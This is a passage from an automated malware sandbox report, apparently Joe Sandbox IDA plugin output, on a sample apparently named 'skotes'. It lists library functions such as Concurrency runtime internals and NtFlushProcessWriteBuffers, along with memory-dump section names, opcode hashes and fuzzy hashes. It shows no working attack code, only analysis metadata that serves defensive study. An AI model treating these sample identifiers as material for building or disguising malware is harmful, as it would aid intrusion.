                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0063EC81
                                                                                                                                                                      • Part of subcall function 00638F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00638F50
                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0063ECE7
                                                                                                                                                                    • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0063ECFF
                                                                                                                                                                    • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0063ED0C
                                                                                                                                                                      • Part of subcall function 0063E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0063E7D7
                                                                                                                                                                      • Part of subcall function 0063E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0063E86F
                                                                                                                                                                      • Part of subcall function 0063E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0063E879
                                                                                                                                                                      • Part of subcall function 0063E7AF: Concurrency::location::_Assign.LIBCMT ref: 0063E8AD
                                                                                                                                                                      • Part of subcall function 0063E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0063E8B5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2363638799-0
                                                                                                                                                                    • Opcode ID: 5b36a6fc52df2fd04793d8a4b4a96b47fdbead8f9986c6ecc0373038cc1d80dd
                                                                                                                                                                    • Instruction ID: cccc86af9a0601ca80e30ed2cc8346834db02e8e8c6fb31e447ed44882fd7d45
                                                                                                                                                                    • Opcode Fuzzy Hash: 5b36a6fc52df2fd04793d8a4b4a96b47fdbead8f9986c6ecc0373038cc1d80dd
                                                                                                                                                                    • Instruction Fuzzy Hash: C9515E31A002159BDF64DF50C895BAEB777AF44310F1540A9E9066B3D6CB72AE06CBE1
                                                                                                                                                                    Function 0062CB97 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • NtFlushProcessWriteBuffers.NTDLL ref: 0062CBAA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: BuffersFlushProcessWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2982998374-0
                                                                                                                                                                    • Opcode ID: 812e6ed86511759d53bc9233a19be847c8b9423652e4b9cfd003a00d04778ea9
                                                                                                                                                                    • Instruction ID: a58a304ac89ffc0189f144a0a679190723d982801525770bbb377e16e05e00c9
                                                                                                                                                                    • Opcode Fuzzy Hash: 812e6ed86511759d53bc9233a19be847c8b9423652e4b9cfd003a00d04778ea9
                                                                                                                                                                    • Instruction Fuzzy Hash: 5BB09232A13C3047DB952B14BC1859E771AAF80E2230A21A6D802A7234CA905E824FD5
                                                                                                                                                                    Function 0062DD91 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 2429cd44c073cf11e27c4883549aa84438e286b523b57a22663d89caa874d4ea
                                                                                                                                                                    • Instruction ID: 9611d191afdd9f6ba33920860ab0948cafa8d1db0cdc2b6ef4cfa80e4412eb4e
                                                                                                                                                                    • Opcode Fuzzy Hash: 2429cd44c073cf11e27c4883549aa84438e286b523b57a22663d89caa874d4ea
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C5190B2905A16CBDB19CF58E8957ADB7F2FB58304F24856AD40AEB350D374A980CF50
                                                                                                                                                                    Function 0062F028 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 229COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0062F2BB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
